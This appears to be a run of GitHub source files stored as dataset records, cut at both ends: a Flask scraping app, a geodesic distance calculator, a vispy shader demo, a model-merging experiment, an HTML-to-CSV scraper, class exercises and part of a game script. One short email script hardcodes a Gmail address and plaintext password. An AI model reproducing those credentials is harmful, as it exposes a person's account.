client['mars']\n\n\n#---------------------------------------------------------\n@app.route('/')\ndef index():\n    mars = db.mars.find_one()\n    return render_template('index.html', mars=mars)\n\n#start scrape route; inserts results into mars MongoDB\n#---------------------------------------------------------\n@app.route('/scrape')\ndef get():\n    mars = db.mars\n    data = scrape()\n    mars.update({}, data, upsert=True)\n\n    return redirect('http://localhost:5000/', code=302)\n\n\nif __name__ == \"__main__\":\n    app.run(debug=True, host='127.0.0.1', port=5000)\n","repo_name":"ksk4uever/WebScraping-Mission-to-Mars","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}{"seq_id":"70490485803","text":"import math\n\n# to calculate the distance using latitude, longitude, and altitude\n# we cannot use the Euclidean distance right away\n# instead, we can use the Haversine formula to calculate the distance using longitude and latitude\n# then we can use the Euclidean distance formula to calculate the distance using altitude\n\n# Earth radius in metres (6378.1 km)\nearth_radius = 6378100\n\n# Calculate the altitude (vertical) distance\ndef altDistance(alt1, alt2):\n    distance = abs(alt1 - alt2)\n\n    return distance\n\n# Calculate the longitude-latitude (horizontal) distance\ndef longLatDistance(long1, long2, lat1, lat2):\n    distance = 2 * earth_radius * math.asin(math.sqrt(math.sin((lat2 - lat1)/2)**2 + math.cos(lat1)*math.cos(lat2)*math.sin((long2 - long1)/2)**2))\n\n    return distance\n\n# Calculate the final distance\ndef finalDistance(altDistance, longLatDistance):\n    distance = math.sqrt(altDistance**2 + longLatDistance**2)\n\n    return distance\n\n# Get the input\ndef getInput():\n    # Point 1\n    print(\"Please input your 1st point data\")\n    lat1 = float(input(\"Latitude 1: \"))\n    long1 = float(input(\"Longitude 1: \"))\n    alt1 = float(input(\"Altitude 1: \"))\n\n    # Point 2\n    print(\"\\nPlease input 
your 2nd point data\")\n    lat2 = float(input(\"Latitude 2: \"))\n    long2 = float(input(\"Longitude 2: \"))\n    alt2 = float(input(\"Altitude 2: \"))\n    \n    return lat1, long1, alt1, lat2, long2, alt2\n\nif __name__ == '__main__':\n    # Assign the data\n    lat1, long1, alt1, lat2, long2, alt2 = getInput()\n\n    # Convert the latitude and the longitude into radians\n    lat1, long1, lat2, long2 = map(math.radians, [lat1, long1, lat2, long2])\n\n    # Get the vertical distance\n    vert_distance = altDistance(alt1, alt2)\n    print(\"\\nVertical Distance: \", vert_distance)\n\n    # Get the horizontal distance\n    horiz_distance = longLatDistance(long1, long2, lat1, lat2)\n    print(\"Horizontal Distance: \", horiz_distance)\n\n    # Get the final distance\n    final_distance = finalDistance(vert_distance, horiz_distance)\n    print(\"Distance of 2 points: \", final_distance)","repo_name":"sulaimanfawwazak/GAMAFORCE-VHC-Assignment","sub_path":"bagian-d/2/3d-distance/3d-distance.py","file_name":"3d-distance.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}{"seq_id":"20704441078","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nShow an image using gloo, with on-mouseover cross-section visualizations.\n\"\"\"\n\nimport numpy as np\nfrom vispy import app\nfrom vispy.gloo import set_viewport, clear, set_state, Program\n\n\n# Image\ndef func(x, y):\n    return (1-x/2+x**5+y**3)*np.exp(-x**2-y**2)\nx = np.linspace(-3.0, 3.0, 512).astype(np.float32)\ny = np.linspace(-3.0, 3.0, 512).astype(np.float32)\nX, Y = np.meshgrid(x, y)\nidxs = func(X, Y)\n\n# Image normalization\nvmin, vmax = idxs.min(), idxs.max()\nidxs = (idxs - vmin) / (vmax - vmin)\n\n\n# Colormaps\ncolormaps = np.ones((16, 512, 4)).astype(np.float32)\nvalues = np.linspace(0, 1, 512)[1:-1]\n\n# Hot colormap\ncolormaps[0, 0] = 0, 0, 1, 1 # Low values (< vmin)\ncolormaps[0, -1] = 0, 1, 0, 1 # High values (> vmax)\ncolormaps[0, 1:-1, 0] = np.interp(values, [0.00, 0.33, 0.66, 1.00],\n                                  [0.00, 1.00, 1.00, 1.00])\ncolormaps[0, 1:-1, 1] = np.interp(values, [0.00, 0.33, 0.66, 1.00],\n                                  [0.00, 0.00, 1.00, 1.00])\ncolormaps[0, 1:-1, 2] = np.interp(values, [0.00, 0.33, 0.66, 1.00],\n                                  [0.00, 0.00, 0.00, 1.00])\n\n# Grey colormap\ncolormaps[1, 0] = 0, 0, 1, 1 # Low values (< vmin)\ncolormaps[1, -1] = 0, 1, 0, 1 # High values (> vmax)\ncolormaps[1, 1:-1, 0] = np.interp(values, [0.00, 1.00],\n                                  [0.00, 1.00])\ncolormaps[1, 1:-1, 1] = np.interp(values, [0.00, 1.00],\n                                  [0.00, 1.00])\ncolormaps[1, 1:-1, 2] = np.interp(values, [0.00, 1.00],\n                                  [0.00, 1.00])\n# Jet colormap\n# ...\n\n\nlines_vertex = \"\"\"\nattribute vec2 position;\nattribute vec4 color;\nvarying vec4 v_color;\nvoid main()\n{\n    gl_Position = vec4(position, 0.0, 1.0 );\n    v_color = color;\n}\n\"\"\"\n\nlines_fragment = \"\"\"\nvarying vec4 v_color;\nvoid main()\n{\n    gl_FragColor = v_color;\n}\n\"\"\"\n\n\nimage_vertex = \"\"\"\nattribute vec2 position;\nattribute vec2 texcoord;\n\nvarying vec2 v_texcoord;\nvoid main()\n{\n    gl_Position = vec4(position, 0.0, 1.0 );\n    v_texcoord = texcoord;\n}\n\"\"\"\n\nimage_fragment = \"\"\"\nuniform float vmin;\nuniform float vmax;\nuniform float cmap;\nuniform float n_colormaps;\n\nuniform sampler2D image;\nuniform sampler2D colormaps;\n\nvarying vec2 v_texcoord;\nvoid main()\n{\n    float value = texture2D(image, v_texcoord).r;\n    float index = (cmap+0.5) / n_colormaps;\n\n    if( value < vmin ) {\n        gl_FragColor = texture2D(colormaps, vec2(0.0,index));\n    } else if( value > vmax ) {\n        gl_FragColor = 
texture2D(colormaps, vec2(1.0,index));\n } else {\n value = (value-vmin)/(vmax-vmin);\n value = 1.0/512.0 + 510.0/512.0*value;\n gl_FragColor = texture2D(colormaps, vec2(value,index));\n }\n}\n\"\"\"\n\n\nclass Canvas(app.Canvas):\n def __init__(self):\n app.Canvas.__init__(self, size=(512, 512),\n keys='interactive')\n\n self.image = Program(image_vertex, image_fragment, 4)\n self.image['position'] = (-1, -1), (-1, +1), (+1, -1), (+1, +1)\n self.image['texcoord'] = (0, 0), (0, +1), (+1, 0), (+1, +1)\n self.image['vmin'] = +0.0\n self.image['vmax'] = +1.0\n self.image['cmap'] = 0 # Colormap index to use\n self.image['colormaps'] = colormaps\n self.image['n_colormaps'] = colormaps.shape[0]\n self.image['image'] = idxs.astype('float32')\n self.image['image'].interpolation = 'linear'\n\n set_viewport(0, 0, *self.physical_size)\n\n self.lines = Program(lines_vertex, lines_fragment)\n self.lines[\"position\"] = np.zeros((4+4+514+514, 2), np.float32)\n color = np.zeros((4+4+514+514, 4), np.float32)\n color[1:1+2, 3] = 0.25\n color[5:5+2, 3] = 0.25\n color[9:9+512, 3] = 0.5\n color[523:523+512, 3] = 0.5\n self.lines[\"color\"] = color\n\n set_state(clear_color='white', blend=True,\n blend_func=('src_alpha', 'one_minus_src_alpha'))\n\n self.show()\n\n def on_resize(self, event):\n set_viewport(0, 0, *event.physical_size)\n\n def on_draw(self, event):\n clear(color=True, depth=True)\n self.image.draw('triangle_strip')\n self.lines.draw('line_strip')\n\n def on_mouse_move(self, event):\n x, y = event.pos\n w, h = self.size\n\n # Make sure the mouse isn't outside of the viewport.\n x = max(0, min(x, w - 1))\n y = max(0, min(y, h - 1))\n\n yf = 1 - y/(h/2.)\n xf = x/(w/2.) - 1\n\n x_norm = int((x*512)//w)\n y_norm = int((y*512)//h)\n\n P = np.zeros((4+4+514+514, 2), np.float32)\n\n x_baseline = P[:4]\n y_baseline = P[4:8]\n x_profile = P[8:522]\n y_profile = P[522:]\n\n x_baseline[...] = (-1, yf), (-1, yf), (1, yf), (1, yf)\n y_baseline[...] 
= (xf, -1), (xf, -1), (xf, 1), (xf, 1)\n\n x_profile[1:-1, 0] = np.linspace(-1, 1, 512)\n x_profile[1:-1, 1] = yf + 0.15 * idxs[y_norm, :]\n x_profile[0] = x_profile[1]\n x_profile[-1] = x_profile[-2]\n\n y_profile[1:-1, 0] = xf + 0.15 * idxs[:, x_norm]\n y_profile[1:-1, 1] = np.linspace(-1, 1, 512)\n y_profile[0] = y_profile[1]\n y_profile[-1] = y_profile[-2]\n\n self.lines[\"position\"] = P\n self.update()\n\nif __name__ == '__main__':\n canvas = Canvas()\n app.run()\n","repo_name":"vispy/vispy","sub_path":"examples/demo/gloo/imshow_cuts.py","file_name":"imshow_cuts.py","file_ext":"py","file_size_in_byte":5308,"program_lang":"python","lang":"en","doc_type":"code","stars":3147,"dataset":"github-code","pt":"30"} +{"seq_id":"12187535230","text":"from argparse import ArgumentParser\nimport numpy as np\nimport torch\nfrom utils import save_results\nimport mnist\nimport mnist_cifar10\nfrom mnist.dataloaders import mnist_combined_test_loader\nfrom mnist_cifar10.dataloaders import (\n dual_channel_cifar10_test_loader,\n dual_channel_mnist_test_loader,\n)\nfrom archs.lenet5 import LeNet5, LeNet5Halfed\nfrom archs.resnet import ResNet18\nfrom archs.pan import PAN, AgnosticPAN\nfrom config import SEEDS\n\n\ndef main(args):\n # Initialize arguments based on dataset chosen\n if args.dataset == \"disjoint_mnist\":\n test_loader = mnist_combined_test_loader(args.test_batch_size)\n args.d1 = \"first5_mnist\"\n args.d2 = \"last5_mnist\"\n args.m1_input_channel = 1\n args.m2_input_channel = 1\n args.output_size = 5\n m = mnist\n elif args.dataset == \"mnist_cifar10\":\n test_loader = [\n dual_channel_mnist_test_loader(args.test_batch_size),\n dual_channel_cifar10_test_loader(args.test_batch_size),\n ]\n args.d1 = \"mnist\"\n args.d2 = \"cifar10\"\n args.m1_input_channel = 1\n args.m2_input_channel = 3\n args.output_size = 10\n m = mnist_cifar10\n\n # Initialize models based on architecture chosen\n if args.arch == \"lenet5\":\n arch = LeNet5\n args.feature_size = 120\n elif args.arch == \"lenet5_halfed\":\n arch = LeNet5Halfed\n args.feature_size = 60\n elif args.arch == \"resnet18\":\n arch = ResNet18\n args.feature_size = 512\n\n # Initialize logits statistics function\n if args.experiment == \"logits_statistics\":\n experiment = m.logits_statistics\n elif args.experiment == \"multi_pass_aug_mean\":\n experiment = m.multi_pass_aug_mean\n elif args.experiment == \"multi_pass_aug_voting\":\n experiment = m.multi_pass_aug_voting\n elif args.experiment == \"smart_coord\":\n experiment = m.smart_coordinator\n\n # Pan settings\n if args.pan_type == \"feature\":\n pan_input_size = args.feature_size\n pan_arch = PAN\n elif args.pan_type == \"logits\":\n pan_input_size = args.output_size\n pan_arch = PAN\n elif args.pan_type == \"agnostic_feature\":\n pan_input_size = 3\n pan_arch = AgnosticPAN\n elif args.pan_type == \"agnostic_logits\":\n pan_input_size = 3\n pan_arch = AgnosticPAN\n\n # Running the test\n print(f\"Dataset: {args.dataset}\")\n print(f\"Model: {args.arch}\")\n results = []\n\n for i in range(len(args.seeds)):\n seed = args.seeds[i]\n np.random.seed(seed)\n torch.manual_seed(seed)\n print(f\"\\nIteration: {i+1}, Seed: {seed}\")\n\n # Load models\n model1 = arch(\n input_channel=args.m1_input_channel, output_size=args.output_size\n ).to(args.device)\n model1.load_state_dict(\n torch.load(\n args.output_dir + f\"{args.d1}_{args.arch}_{args.seeds[i]}\",\n map_location=torch.device(\"cpu\"),\n )\n )\n model2 = arch(\n input_channel=args.m2_input_channel, output_size=args.output_size\n 
).to(args.device)\n model2.load_state_dict(\n torch.load(\n args.output_dir + f\"{args.d2}_{args.arch}_{args.seeds[i]}\",\n map_location=torch.device(\"cpu\"),\n )\n )\n\n # Running the experiment\n if args.experiment == \"smart_coord\":\n pan1 = pan_arch(input_size=pan_input_size).to(args.device)\n pan1.load_state_dict(\n torch.load(\n args.pan_dir\n + f\"pan_{args.pan_type}_{args.dataset}({args.d1})_{args.arch}_{args.seeds[i]}\",\n map_location=torch.device(\"cpu\"),\n )\n )\n pan2 = pan_arch(input_size=pan_input_size).to(args.device)\n pan2.load_state_dict(\n torch.load(\n args.pan_dir\n + f\"pan_{args.pan_type}_{args.dataset}({args.d2})_{args.arch}_{args.seeds[i]}\",\n map_location=torch.device(\"cpu\"),\n )\n )\n result = experiment(args, model1, model2, pan1, pan2, device, test_loader)\n else:\n result = experiment(args, model1, model2, device, test_loader)\n\n # Adding more info to the result to be saved\n for r in result:\n r.update({\"iteration\": i, \"seed\": args.seeds[i]})\n results.extend(result)\n\n # Save the results\n if args.save_results and args.experiment == \"smart_coord\":\n save_results(\n f\"{args.dataset}_{args.arch}_{args.pan_type}\",\n results,\n f\"{args.results_dir}{args.experiment}/\",\n )\n elif args.save_results:\n save_results(\n f\"{args.dataset}_{args.arch}\",\n results,\n f\"{args.results_dir}{args.experiment}/\",\n )\n \n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n parser.add_argument(\n \"--dataset\",\n type=str,\n default=\"disjoint_mnist\",\n choices=[\"disjoint_mnist\", \"mnist_cifar10\"],\n )\n parser.add_argument(\n \"--arch\",\n type=str,\n default=\"lenet5\",\n choices=[\"lenet5\", \"lenet5_halfed\", \"resnet18\"],\n )\n parser.add_argument(\n \"--experiment\",\n type=str,\n default=\"logits_statistics\",\n choices=[\n \"logits_statistics\",\n \"multi_pass_aug_mean\",\n \"multi_pass_aug_voting\",\n \"smart_coord\",\n ],\n )\n parser.add_argument(\n \"--pan_type\",\n type=str,\n default=\"feature\",\n choices=[\"feature\", \"logits\", \"agnostic_feature\", \"agnostic_logits\"],\n )\n parser.add_argument(\"--test_batch_size\", type=int, default=1000)\n parser.add_argument(\"--epochs\", type=int, default=10)\n parser.add_argument(\"--lr\", type=float, default=0.01, help=\"learning rate\")\n parser.add_argument(\"--momentum\", type=float, default=0.9)\n parser.add_argument(\"--no_cuda\", type=bool, default=False)\n parser.add_argument(\"--log_interval\", type=int, default=10)\n parser.add_argument(\"--save_results\", type=bool, default=True)\n parser.add_argument(\"--results_dir\", type=str, default=\"./results/merge/\")\n parser.add_argument(\"--output_dir\", type=str, default=\"./cache/models/\")\n parser.add_argument(\"--pan_dir\", type=str, default=\"./cache/models/pan/\")\n\n args = parser.parse_args()\n\n use_cuda = not args.no_cuda and torch.cuda.is_available()\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n args.seeds = SEEDS\n args.device = device\n main(args)\n","repo_name":"cwkang1998/network-merging","sub_path":"merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":6634,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"30"} +{"seq_id":"1317156467","text":"###### WEB SCRAPER\n#######################\n\n##### Imports\nfrom bs4 import BeautifulSoup as bs\nimport csv\n\n##### Variables\nheaders = [\"Name\", \"Term\", \"GPA\", \"Approval\", \"Program\", \"Major\", \"Support\" ]\nnames = []\nterms = []\ngpas = []\napproval = []\nprogram = []\nmoney = 
[]\nmajors = []\n\n##### Functions\ndef get_span(lst):\n for ele in lst:\n try:\n content = ele.find('span')\n return content.contents\n except:\n continue\n return \"\"\n\ndef is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False\n\ndef deList(lst):\n final = \"\"\n for i in lst:\n final += i\n return final\n\ndef write(_row):\n with open(\"StudyAbroadSF18.csv\", \"a\") as f:\n writer = csv.writer(f, quoting = csv.QUOTE_NONNUMERIC)\n writer.writerow(_row)\n\n##### Code\nwith open(\"html.txt\", \"r\") as txtFile:\n htmlData = txtFile.read()\n soup = bs(htmlData, 'html.parser')\n tableHtml = soup.find_all('table',class_=\"table-bordered table-condensed data-table\")\n rowHtml = soup.find_all('td', class_=\"LightSolidBorder\", valign=\"top\")\n\n for personData in tableHtml:\n personRows = personData.find_all(\"tr\")\n for row in personRows:\n spans = row.find_all('span')\n\n # the first span (ie spans[0]) gives content Id\n #\n # only want:\n # 1) 1-1, Advisor Approval\n # 2) 2-1, Study Abroad Program\n # 3) 2-6, Financial Need\n # 4) 2-9, Major Field of Study\n try:\n if spans[0].string.strip() == \"1-1\":\n try:\n approval.append(spans[1].string.strip())\n except:\n approval.append(\"check approval\")\n\n if spans[0].string.strip() == \"2-1\":\n try:\n program.append(spans[1].string.strip())\n except:\n print(\"no program\")\n\n if spans[0].string.strip() == \"2-6\":\n\n try:\n financialInfo = ''\n\n for e in spans[1].findAll('br'):\n e.replace_with(' ')\n\n for e in spans[1].findAll('strong'):\n e.replace_with(' ')\n\n for i in spans[1].contents:\n financialInfo += i.strip() + \" \"\n\n money.append(financialInfo)\n\n except:\n money.append(\"check attachment\")\n\n if spans[0].string.strip() == \"2-9\":\n try:\n majors.append(spans[1].string.strip())\n except:\n print(\"no major\")\n\n except:\n continue\n\n\n ## Get Names, GPAS and terms\n count=1\n for ele in rowHtml:\n\n info = ele.contents\n\n if (count%3 == 1):\n for i in info:\n\n try:\n i = i.contents[0].replace(u'\\xa0', u'')\n i = i.replace(u'\\n', u'')\n i = i.replace(u'\\t', u'')\n names.append(i)\n except:\n continue\n\n elif (count%3 == 2):\n for i in info:\n i = i.contents[0]\n if \"Academic\" in i:\n continue\n terms.append(i)\n\n else:\n for i in info:\n i = i.string.replace(u'\\xa0', u'')\n i = i.replace(u'\\n', u'')\n i = i.replace(u'\\t', u'')\n if (i == ''):\n continue\n gpas.append(i)\n\n count += 1\n\n# Due to html format, we lost a approval, GPA and Term observation\n# Add missing entry manually\nterms.insert(21,\"Summer\")\ngpas.insert(21,\"0\")\napproval.append(\"YES\")\n\n# Already checked lists are all same length\n# Write CSV File\nwrite(headers)\nfor i in range(len(names)):\n rowData = [names[i],terms[i], gpas[i], approval[i], program[i], majors[i], money[i]]\n write(rowData)\n","repo_name":"carmenastorne/HtmlParser","sub_path":"Scrape.py","file_name":"Scrape.py","file_ext":"py","file_size_in_byte":4135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"27979885010","text":"import smtplib\nconnection=smtplib.SMTP(\"smtp.gmail.com\",587)\nconnection.starttls()\nconnection.login(\"vaishnavi.p6521@gmail.com\",\"Priy@6521\")\nmessage=\"Hello , I am Vaishnavi\"\nconnection.sendmail(\"vaishnavi.p6521@gmail.com\", \"priya.hajela358@gmail.com\", message)\ndata=input(\"Enter a string:\")\nx=slice(5)\nprint(data)\nprint(data[x])\nprint(\"Email sent 
successfully\")\nconnection.quit()","repo_name":"KalaiarasiPattusamy/July24-code-assessment","sub_path":"JULY24/24july-Vaishnavi-code assesment/Stringmail.py","file_name":"Stringmail.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"30"}{"seq_id":"10973019067","text":"'''Create a class Student and then do the following\nCreate a data member to count number of students\nCreate a constructor to initialize name and other personal details\nCreate a function to calculate number of students\nCreate a function to display students name ,rollno and grades\nCreate a TransferStudent class and it should inherit the properties of Student class.\nCreate instances of TransferStudent and Student class and call their member functions.\n'''\nclass student:\n    no_of_student = 0\n\n    def __init__(self, name,rollno,grades):\n        self.name = name\n        self.rollno=rollno\n        self.grades=grades\n\n\n    def count(self):\n        self.__class__.no_of_student +=1\n\n\n    def details(self):\n        return \"%s is student and rollno %s and has grades %s \"% (self.name, self.rollno, self.grades)\n#Create a TransferStudent class and it should inherit the properties of Student class.\nclass TransferStudent(student):\n    def __init__(self,name,rollno,grades):\n        student.__init__(self,name,rollno,grades)\n\n\n#Create instances of TransferStudent and Student class and call their member functions.\nAli = student(\"Ali\",23321,\"B\")\nAli.count()\nHasan = TransferStudent(\"Hasan\",3232121,\"C\")\nHasan.count()\n\nprint(Ali.details())\nprint(\"Number of students are\",Ali.__class__.no_of_student)\nprint(Hasan.details())\nprint(\"Number of students are\",Hasan.__class__.no_of_student)\n\n\n","repo_name":"liaquat85/Python-Machine-Learning-UMKC","sub_path":"Lesson 4/ICE4/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"}{"seq_id":"39091403381","text":"class Node:\n    def __init__(self,dataval):\n        self.dataval=dataval\n        self.nextval=None\nclass Linkedlist:\n    def __init__(self):\n        self.headval=None\n    def printlist(self):\n        printval=self.headval\n        while printval!=None:\n            print(printval.dataval)\n            printval=printval.nextval\n\n    def scarch(self,k):\n        p=self.headval\n        if p!=None:\n            while p.nextval!=None:\n                if p.dataval==k:\n                    return True\n                p=p.nextval\n            if p.dataval==k:\n                return True\n        return False\n\nlist=Linkedlist()\nlist.headval=Node(\"sat\")\ne1=Node(\"Sun\")\ne2=Node(\"Mon\")\nlist.headval.nextval=e1\ne1.nextval=e2\nlist.printlist()\nprint(\"Given node is\",list.scarch(\"sat\"))\n","repo_name":"naim04/Practice-Algorithm","sub_path":"Scarching Unsorted linkedlist.py","file_name":"Scarching Unsorted linkedlist.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"}{"seq_id":"5298052582","text":"from Plasma import *\nfrom PlasmaTypes import *\nfrom PlasmaConstants import *\nfrom PlasmaKITypes import *\nfrom xStartPathHelpers import *\n\n\n#rgnSnsrFissureDrop = ptAttribActivator(1, \"rgn snsr: fissure drop spawn\")\nrespFissureDropStart = ptAttribResponder(1,\"resp: fissure drop start\")\nrespFissureDropMain = ptAttribResponder(2,\"resp: fissure drop main\")\n\nloadTomahna = 0\nloadZandi = 0\nloadBook = 0\nfissureDrop = 0\n\nkIntroPlayedChronicle = \"IntroPlayed\"\n\n\nclass Cleft(ptResponder):\n\n    def __init__(self):\n        
ptResponder.__init__(self)\n self.id = 5209\n self.version = 22\n\n #var used to load in Cleft/Tomahna specific stuff based on chronicle vals\n global loadTomahna\n global loadZandi\n global loadBook\n \n loadTomahna = 0\n loadZandi = 0\n loadBook = 0\n\n #checks chronicle entries, if don't exist or is set to no,\n #then decides if Tomahna or Zandi should be paged in\n\n if not IsCleftSolved():\n loadZandi = 1\n loadBook = 1\n\n vault = ptVault()\n entryTomahna = vault.findChronicleEntry(\"TomahnaLoad\")\n if entryTomahna is not None:\n entryTomahnaValue = entryTomahna.getValue()\n if entryTomahnaValue == \"yes\":\n loadTomahna = 1\n if loadZandi:\n loadZandi = 0\n if loadBook:\n loadBook = 0\n\n pages = []\n\n # Add the age specific pages\n if loadTomahna:\n pages += [\"Cleft\",\"tmnaDesert\",\"MaleShortIdle\",\"FemaleShortIdle\",\"YeeshaFinalEncounter\",\"FemaleTurnRight180\",\"MaleTurnRight180\",\"clftSndLogTracks\",\"clftAtrusGoggles\"]\n else:\n pages += [\"Desert\",\"Cleft\",\"FemaleCleftDropIn\",\"MaleCleftDropIn\",\"clftJCsDesert\",\"clftJCsChasm\"]\n if loadZandi:\n pages += [\"clftZandiVis\",\"ZandiCrossLegs\",\"ZandiDirections\",\"ZandiDirections01\",\"ZandiDirections02\",\"ZandiDirections03\"]\n pages += [\"ZandiIdle\",\"ZandiRubNose\",\"ZandiScratchHead\",\"ZandiTurnPage\",\"ZandiAllFace\",\"ZandiOpen01Face\"]\n pages += [\"ZandiOpen02Face\",\"ZandiRand01Face\",\"ZandiRand02Face\",\"ZandiRand03Face\",\"ZandiRand04Face\",\"ZandiRand05Face\"]\n pages += [\"ZandiRes01aFace\",\"ZandiRes01bFace\",\"ZandiRes02aFace\",\"ZandiRes02bFace\",\"ZandiRes03aFace\",\"ZandiRes03bFace\"]\n pages += [\"ZandiJC01aFace\",\"ZandiJC01bFace\",\"ZandiJC02aFace\",\"ZandiJC02bFace\",\"ZandiJC03aFace\",\"ZandiJC03bFace\"]\n pages += [\"ZandiJC04aFace\",\"ZandiJC04bFace\",\"ZandiJC05aFace\",\"ZandiJC05bFace\",\"ZandiJC06aFace\",\"ZandiJC06bFace\"]\n pages += [\"ZandiJC07aFace\",\"ZandiJC07bFace\"]\n else:\n PtDebugPrint(\"Zandi seems to have stepped away from the Airstream. Hmmm...\")\n if loadBook:\n pages += [\"clftYeeshaBookVis\",\"FemaleGetPersonalBook\",\"MaleGetPersonalBook\"]\n else:\n PtDebugPrint(\"Zandi seems to have stepped away from the Airstream. Hmmm...\")\n\n # Put in all the common pages\n pages += [\"BookRoom\",\"clftAtrusNote\"]\n pages += [\"FemaleClimbOffTreeLadder\",\"FemaleGetOnTreeLadder\",\"FemaleWindmillLockedCCW\",\"FemaleWindmillLockedCW\",\"FemaleWindmillStart\"]\n pages += [\"MaleClimbOffTreeLadder\",\"MaleGetOnTreeLadder\",\"MaleWindmillLockedCCW\",\"MaleWindmillLockedCW\",\"MaleWindmillStart\"]\n pages += [\"YeeshaVisionBlocked\",\"YeeshaFinalVision\"]\n\n PtPageInNode(pages)\n\n if loadTomahna:\n #now that Tomahna pages have loaded, reset its chronicle value back to no,\n #so subsequent linking will default to regular Cleft instead of Tomahna,\n #unless a Tomahna link is used, of course...\n entryTomahna.setValue(\"no\")\n entryTomahna.save()\n\n pass\n\n\n def OnFirstUpdate(self):\n pass\n # test for first time to play the intro movie\n vault = ptVault()\n entry = vault.findChronicleEntry(kIntroPlayedChronicle)\n if entry is not None:\n # already played intro sometime in the past... just let 'em play\n PtSendKIMessage(kEnableKIandBB,0)\n else:\n # make sure the KI and blackbar is still diabled\n PtSendKIMessage(kDisableKIandBB,0)\n # It's the first time... 
start the intro movie, just by loading the movie dialog\n PtLoadDialog(\"IntroMovieGUI\")\n\n def OnServerInitComplete(self):\n global loadTomahna\n global fissureDrop\n \n ageSDL = PtGetAgeSDL()\n if StartInCleft():\n ageSDL[\"clftYeeshaBookVis\"] = (1,)\n PtSendKIMessageInt(kUpgradeKILevel, kMicroKI)\n PtSendKIMessage(kDisableEntireYeeshaBook,0)\n PtFindSceneobject(\"microBlackBarBody\", \"GUI\").draw.disable()\n PtGetLocalAvatar().avatar.setDontPanicLink(True)\n else:\n ageSDL[\"clftYeeshaBookVis\"] = (0,)\n\n # sets Tomahna SDL based on what is being loaded (thanks to chronicle val)\n # also settings previously contained in .fni files\n if loadTomahna:\n SDLVarName = \"clftTomahnaActive\"\n ageSDL[SDLVarName] = (1,)\n PtDebugPrint(\"Cleft.OnServerInitComplete: loadTomahna is 1, setting clftTomahnaActive SDL to 1\")\n #PtFogSetDefLinear(start, end, density)\n PtFogSetDefLinear(0,0,0)\n PtSetClearColor(.4,.4,.5)\n\n SDLVarSceneBahro = \"clftSceneBahroUnseen\"\n boolSceneBahro = ageSDL[SDLVarSceneBahro][0]\n if boolSceneBahro:\n PtDebugPrint(\"Cleft.OnServerInitComplete: SDL says bahro hasn't played yet, paging in SceneBahro stuff...\")\n PtPageInNode(\"clftSceneBahro\")\n else:\n PtDebugPrint(\"Cleft.OnServerInitComplete: SDL says SceneBahro already played, will NOT page in\")\n \n ageSDL.setNotify(self.key,SDLVarSceneBahro,0.0)\n \n SDLVarSceneYeesha = \"clftSceneYeeshaUnseen\"\n boolSceneYeesha = ageSDL[SDLVarSceneYeesha][0]\n if boolSceneYeesha:\n #PtDebugPrint(\"Cleft.OnServerInitComplete: SDL says Yeesha hasn't played yet, paging in SceneYeesha stuff...\")\n #PtPageInNode(\"clftSceneYeesha\")\n SDLVarOfficeDoor = \"clftOfficeDoorClosed\"\n boolOfficeDoor = ageSDL[SDLVarOfficeDoor][0]\n if boolOfficeDoor:\n PtDebugPrint(\"Cleft.OnServerInitComplete: SDL says Yeesha will play and office door is shut, will open it\")\n ageSDL[SDLVarOfficeDoor] = (0,)\n else:\n PtDebugPrint(\"Cleft.OnServerInitComplete: SDL says SceneYeesha already played, will NOT page in\")\n\n else:\n SDLVarName = \"clftTomahnaActive\"\n ageSDL[SDLVarName] = (0,)\n PtDebugPrint(\"Cleft.OnServerInitComplete: loadTomahna is 0, setting clftTomahnaActive SDL set to 0\")\n PtFogSetDefLinear(0,0,0)\n PtSetClearColor(0,0,0)\n \n linkmgr = ptNetLinkingMgr()\n link = linkmgr.getCurrAgeLink()\n spawnPoint = link.getSpawnPoint()\n\n spTitle = spawnPoint.getTitle()\n spName = spawnPoint.getName()\n \n if spName == \"LinkInPointFissureDrop\":\n fissureDrop = 1\n #avatar.physics.suppress(False)\n avatar = 0\n try:\n avatar = PtGetLocalAvatar()\n except:\n PtDebugPrint(\"failed to get local avatar\")\n return\n avatar.avatar.registerForBehaviorNotify(self.key)\n cam = ptCamera()\n cam.disableFirstPersonOverride()\n cam.undoFirstPerson()\n PtDisableMovementKeys()\n PtSendKIMessage(kDisableEntireYeeshaBook,0)\n respFissureDropStart.run(self.key,avatar=PtGetLocalAvatar())\n\n\n def Load(self): \n \n ageSDL = PtGetAgeSDL()\n\n # If both Kitchen and Office Doors are closed when linking into the age, this will open the Kitchen door.\n # It prevents Player from being locked out of Kitchen/Office if both doors were left shut when Player was last there...\n \n SDLVarKitchenDoor = \"clftKitchenDoorClosed\"\n SDLVarOfficeDoor = \"clftOfficeDoorClosed\"\n \n boolKitchenDoor = ageSDL[SDLVarKitchenDoor][0]\n boolOfficeDoor = ageSDL[SDLVarOfficeDoor][0]\n \n if boolKitchenDoor and boolOfficeDoor:\n PtDebugPrint(\"Cleft.OnLoad: both Kitchen and Office doors are closed... 
